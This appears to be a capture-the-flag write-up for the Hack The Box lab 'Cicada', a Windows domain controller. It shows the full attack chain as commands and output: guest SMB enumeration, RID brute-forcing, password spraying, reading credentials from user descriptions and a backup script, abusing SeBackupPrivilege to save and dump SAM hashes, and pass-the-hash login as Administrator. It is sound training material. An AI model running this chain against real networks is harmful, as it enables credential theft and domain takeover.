Cicada
Hello everyone, hope you're doing great. This machine is all about enumeration If you can enumerate correctly and keep it simple and easy, you won't have any problem solving it. First, we run Nmap scanning all ports, run default scripts on it, determine service versions, detect os, save the scan to the file named cicadaNMAP, and while you are scanning, show me what you are doing.
nmap -p- -sCV -O -oA cicadaNMAP 10.10.11.35 -vvvSMB
First tried SMB NULL Session Authentication and it worked, but when enumerating shares or users, we get STATUS_ACCESS_DENIED. So tried the guest account and it wasn't disabled :) and we could read a share named HR, but couldn't enumerate the users.
➜ Cicada nxc smb 10.10.11.35 -u 'guest' -p '' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\guest:
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL Logon server shareUtilizing the spider_plus module allowed me to list all the files from readable shares.
➜ Cicada nxc smb 10.10.11.35 -u 'guest' -p '' --shares -M spider_plus
[+] Saved share-file metadata to "/home/legend/.nxc/modules/nxc_spider_plus/10.10.11.35.json".
[*] SMB Shares: 7 (ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL)
[*] SMB Readable Shares: 2 (HR, IPC$)
[*] SMB Filtered Shares: 1
[*] Total folders found: 0
[*] Total files found: 1
[*] File size average: 1.24 KB
[*] File size min: 1.24 KB
[*] File size max: 1.24 KB/.nxc/modules/nxc_spider_plus/10.10.11.35.json
{
"HR": {
"Notice from HR.txt": {
"atime_epoch": "2024-08-28 13:31:48",
"ctime_epoch": "2024-03-14 08:29:03",
"mtime_epoch": "2024-08-28 13:31:48",
"size": "1.24 KB"
}
}
}Download all files from the readable shares with -o DOWNLOAD_FLAG=True
➜ Cicada nxc smb 10.10.11.35 -u 'guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True
[*] Downloads successful: 1
[+] All files processed successfully.
➜ Cicada cp /home/legend/.nxc/modules/nxc_spider_plus/10.10.11.35/HR/Notice\ from\ HR.txt .Notice from HR.txt
Dear new hire!
Welcome to Cicada Corp! We're thrilled to have you join our team.
As part of our security protocols, it's essential that you change
your default password to something unique and secure.
Your default password is: Cicada$M6Cor*REDACTED*
...SNIP...
Now we have a password to spray, but we don't have a users list. And we can't use LDAP but we can use smb to enumerate users with RID
➜ Cicada nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute
[*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
[+] cicada.htb\guest:
498: CICADA\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: CICADA\Administrator (SidTypeUser)
501: CICADA\Guest (SidTypeUser)
502: CICADA\krbtgt (SidTypeUser)
512: CICADA\Domain Admins (SidTypeGroup)
...SNIP...
1000: CICADA\CICADA-DC$ (SidTypeUser)
1101: CICADA\DnsAdmins (SidTypeAlias)
1102: CICADA\DnsUpdateProxy (SidTypeGroup)
1103: CICADA\Groups (SidTypeGroup)
1104: CICADA\john.smoulder (SidTypeUser)
1105: CICADA\sarah.dantelia (SidTypeUser)
1106: CICADA\michael.wrightson (SidTypeUser)
1108: CICADA\david.orelious (SidTypeUser)
1109: CICADA\Dev Support (SidTypeGroup)
1601: CICADA\emily.oscars (SidTypeUser)To create a user list:
➜ Cicada nxc smb 10.10.11.35 -u 'guest' -p '' --rid-brute | grep "SidTypeUser" | awk -F '\\' '{print $2}' | awk '{print $1}' > users.txtPassword spray with the user list we have, and we get a hit! .
➜ Cicada nxc smb 10.10.11.35 -u users.txt -p 'Cicada$M6Cor*REDACTED*' --continue-on-success
[+] cicada.htb\michael.wrightson:Cicada$M6Cor*REDACTED*We have read permission on netlogon and sysvol, but we can't do anything with them. So let's see if there is any interesting data in the user's description.
➜ Cicada nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6Cor*REDACTED*' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server shareWe found a password in david's description.
➜ Cicada nxc smb 10.10.11.35 -u 'michael.wrightson' -p 'Cicada$M6C*REDACTED*' --users
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\michael.wrightson:Cicada$M6Corpb*@Lp#nZp!8
SMB 10.10.11.35 445 CICADA-DC -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.35 445 CICADA-DC Administrator 2024-08-26 20:08:03 2 Built-in account for administering the computer/domain
SMB 10.10.11.35 445 CICADA-DC Guest 2024-08-28 17:26:56 2 Built-in account for guest access to the computer/domain
SMB 10.10.11.35 445 CICADA-DC krbtgt 2024-03-14 11:14:10 2 Key Distribution Center Service Account
SMB 10.10.11.35 445 CICADA-DC john.smoulder 2024-03-14 12:17:29 2
SMB 10.10.11.35 445 CICADA-DC sarah.dantelia 2024-03-14 12:17:29 2
SMB 10.10.11.35 445 CICADA-DC michael.wrightson 2024-03-14 12:17:29 0
SMB 10.10.11.35 445 CICADA-DC david.orelious 2024-03-14 12:17:29 1 Just in case I forget my password is aRt$L*REDACTED*
SMB 10.10.11.35 445 CICADA-DC emily.oscars 2024-08-22 21:20:17 1
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated 8 local users: CICADAWe have read permission on a DEV share, and it has a backup script.
➜ Cicada nxc smb 10.10.11.35 -u 'david.orelious' -p 'aRt$Lp*REDACTED*' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ Default share
SMB 10.10.11.35 445 CICADA-DC DEV READ
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server share{
"DEV": {
"Backup_script.ps1": {
"atime_epoch": "2024-08-28 13:28:22",
"ctime_epoch": "2024-03-14 08:31:38",
"mtime_epoch": "2024-08-28 13:28:22",
"size": "601 B"
}
}cp /home/legend/.nxc/modules/nxc_spider_plus/10.10.11.35/DEV/Backup_script.ps1 .We found credentials for Emily that we can use.
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp*REDACTED*" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"we have write permission on C$ so maybe we can have remote access on the DC.
➜ Cicada nxc smb 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp*REDACTED*' --shares
SMB 10.10.11.35 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.35 445 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt
SMB 10.10.11.35 445 CICADA-DC [*] Enumerated shares
SMB 10.10.11.35 445 CICADA-DC Share Permissions Remark
SMB 10.10.11.35 445 CICADA-DC ----- ----------- ------
SMB 10.10.11.35 445 CICADA-DC ADMIN$ READ Remote Admin
SMB 10.10.11.35 445 CICADA-DC C$ READ,WRITE Default share
SMB 10.10.11.35 445 CICADA-DC DEV
SMB 10.10.11.35 445 CICADA-DC HR READ
SMB 10.10.11.35 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.10.11.35 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.10.11.35 445 CICADA-DC SYSVOL READ Logon server shareWe have local admin privilege on CICADA-DC.
➜ Cicada nxc winrm 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
WINRM 10.10.11.35 5985 CICADA-DC [*] Windows Server 2022 Build 20348 (name:CICADA-DC) (domain:cicada.htb)
WINRM 10.10.11.35 5985 CICADA-DC [+] cicada.htb\emily.oscars:Q!3@Lp#M6b*7t*Vt (Pwn3d!)Like sudo -l on Linux boxes, we do whoami /all to see what privileges we have, and we have SeBackupPrivilege and SeRestorePrivilege we can use to get the administrator hash with it.
➜ Cicada evil-winrm -i 10.10.11.35 -u 'emily.oscars' -p 'Q!3@Lp*REDACTED*'
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\sam sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> reg save hklm\system system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Documents\system to system
Info: Download successful!Dump the hashes:
➜ Cicada secretsdump.py -sam sam -system system LOCAL
Impacket v0.13.0.dev0+20250320.12616.e61ff5d - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x3c2b033757a49110a9ee680b46e8d620
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c9*REDACTED*:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Cleaning up...➜ Cicada evil-winrm -i 10.10.11.35 -u administrator -H 2b87e7c9*REDACTED*
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../desktop; type root.txt
cb60fc11ba4e*REDACTED*Last updated
Was this helpful?
